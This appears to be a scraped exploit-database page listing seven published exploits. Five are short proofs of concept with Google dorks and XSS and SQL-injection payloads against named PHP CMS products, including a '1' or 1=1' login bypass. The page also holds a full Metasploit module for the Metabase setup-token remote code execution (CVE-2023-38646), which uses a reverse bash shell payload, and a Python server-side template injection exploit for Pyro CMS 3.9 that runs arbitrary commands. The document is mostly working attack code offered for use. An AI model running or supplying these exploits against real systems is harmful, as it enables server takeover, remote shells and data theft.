Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Discussion on Kontackt - The Exclusive PHP Social Network Platform (v1.18) XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://codecanyon.net/item/social-plus-ultimate-social-network-platform/21391853 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Register new user https://127.0.0.1/ . [+] use payload in search box : <script>alert(/indoushka/);</script> Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Digisha CMS V1.2.7 Auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : http://www.digisha.com/ | | # Dork : Powered by Digisha | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : user & pass = 1' or 1=1 -- - [+] http://127.0.0.1/ksminesindiacom/admin/welcome.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : DigaSell - Digital store PHP Script V1.0.0 Blind Sql Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2 | | # Dork : "Copyright © DigaSell All Rights Reserved." | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : http://127.0.0.1/codsemcom/digasell/search?term=1 <==== inject here [+] Panel : https://127.0.0.1/codsemcom/digasell/admin/dashboard Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>========================================================================================== | # Title : Doma CMS v1.0 xss Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://www.matstroeng.se/doma/ | | # Dork : Digital Orienteering Map Archive, version 1.0 | Log in | ========================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] use payload : %22onmouseover%3d'prompt(1373)'bad%3d%22 [+] http://127.0.0.1/doma/users.php/%22onmouseover%3d'prompt(903296)'bad%3d%22 Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Desenvolvido C3iM CMS v2.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://c3im.pt/ | | # Dork : intext:''Desenvolvido C3iM'' site:pt | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : <marquee>Hacked by indoushka</marquee> [+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Metabase Setup Token RCE', 'Description' => %q{ Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token is accessible even after the setup process has been completed. With this token a user is able to submit the setup functionality to create a new database. When creating a new database, an H2 database string is created with a TRIGGER that allows for code execution. We use a sample database for our connection string to prevent corrupting real databases. Successfully tested against Metabase 0.46.6. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Maxwell Garrett', # original PoC, analysis 'Shubham Shah' # original PoC, analysis ], 'References' => [ ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'], ['URL', 'https://www.metabase.com/blog/security-advisory'], ['CVE', '2023-38646'] ], 'Platform' => ['unix'], 'Privileged' => false, 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python }, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2023-07-22', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(3000), OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/']) ] ) end def get_bootstrap_json_blob_from_html_resp(html) %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html begin JSON.parse(Regexp.last_match(1)) rescue JSON::ParserError, TypeError print_bad('Unable to parse JSON blob') nil end end def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'method' => 'GET' ) return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 json = get_bootstrap_json_blob_from_html_resp(res.body) fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil? version = json.dig('version', 'tag') return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil? # typically v0.46.6 version = version.gsub('v', '') if Rex::Version.new(version) < Rex::Version.new('0.46.6.1') return CheckCode::Appears("Version Detected: #{version}") end CheckCode::Safe("Version not vulnerable: #{version}") end def exploit res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'method' => 'GET' ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200 json = get_bootstrap_json_blob_from_html_resp(res.body) fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil? setup_token = json['setup-token'] if setup_token.nil? print_status('Setup token is nil, checking secondary location') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'), 'method' => 'GET' ) fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200 json = res.get_json_document setup_token = json['setup-token'] end fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil? print_good("Found setup token: #{setup_token}") print_status('Sending exploit (may take a few seconds)') # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them b64_pe = ::Base64.strict_encode64(payload.encoded) equals_count = b64_pe.count('=') if equals_count > 0 b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count) end send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'), 'method' => 'POST', 'ctype' => 'application/json', 'data' => { 'token' => setup_token, 'details' => { # 'is_on_demand' => false, # without this, the shell takes ~20 sec longer to get # 'is_full_sync' => false, # 'is_sample' => false, # 'cache_ttl' => nil, # 'refingerprint' => false, # 'auto_run_queries' => true, # 'schedules' => {}, 'details' => { 'db' => "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x", 'advanced-options' => false, 'ssl' => true }, 'name' => Rex::Text.rand_text_alphanumeric(6..12), 'engine' => 'h2' } }.to_json ) end end </code></pre>

<pre><code># Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Date: 03/08/2023 # Vendor: https://pyrocms.com/ # Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation # Vulnerable Version(s): 3.9 # CVE: CVE-2023-29689 # Notes: You need a user who has access to /admin privilege # Example Usage: # First, run the script: python3 CVE-2023-29689.py # Please follow these steps: # 1. Enter the application URL: http://localhost:8000 # 2. Enter the email for authentication: admin@adm.com # 3. Enter the password: Admin@@2023 # 4. Enter the command to be executed: id # Result of command execution: # uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake) import requests from bs4 import BeautifulSoup from urllib.parse import urljoin def login(session, url, email, password): login_url = urljoin(url, '/admin/login') response = session.get(login_url) soup = BeautifulSoup(response.content, 'html.parser') token = soup.find('input', {'name': '_token'})['value'] payload = { '_token': token, 'email': email, 'password': password } session.post(login_url, data=payload) # Function to edit role 1 and extract the Description of the Admin user. def edit_role_and_extract_description(session, url, command): edit_role_url = urljoin(url, '/admin/users/roles/edit/1') response = session.get(edit_role_url) soup = BeautifulSoup(response.content, 'html.parser') token = soup.find('input', {'name': '_token'})['value'] payload = { '_token': token, 'name_en': 'Admin', 'slug': 'admin', 'description_en': f'{{{{["{command}"]|map("system")|join}}}}', 'action': 'save_exit' } session.post(edit_role_url, data=payload) # Extract the updated Description from role 1. response = session.get(urljoin(url, '/admin/users/roles')) soup = BeautifulSoup(response.content, 'html.parser') description = soup.find('td', {'data-title': 'Description'}).text.strip() return description def main(): url = input("Enter the application URL: ") email = input("Enter the email for authentication: ") password = input("Enter the password : ") command = input("Enter the command to be executed: ") with requests.Session() as session: login(session, url, email, password) description = edit_role_and_extract_description(session, url, command) print("\nResult of command execution:") print(description) if __name__ == "__main__": main() </code></pre>